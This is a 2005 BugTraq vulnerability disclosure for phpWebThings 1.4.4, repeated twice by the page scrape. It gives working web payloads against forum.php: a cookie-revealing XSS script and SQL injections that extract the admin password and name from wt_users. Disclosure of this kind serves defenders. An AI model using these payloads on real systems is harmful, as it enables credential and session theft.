BugTraq
Back to list
|
Post reply
XSS & SQL injection in phpWebThing
Nov 05 2005 03:00AM
xx_hack_xx_2004 hotmail com
Vulnerable: phpWebThings 1.4.4
http://phpwebthings.org
The bug reside in : forum.php
Exploit :
http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]
Example :
XSS
http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>
SQL
For Passowrd
http://xxx.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*
For Name
http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*
Discovery by Linux_Drox
http://www.lezr.com
Best Regards
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://phpwebthings.org
The bug reside in : forum.php
Exploit :
http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]
Example :
XSS
http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>
SQL
For Passowrd
http://xxx.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/*
For Name
http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/*
Discovery by Linux_Drox
http://www.lezr.com
Best Regards
[ reply ]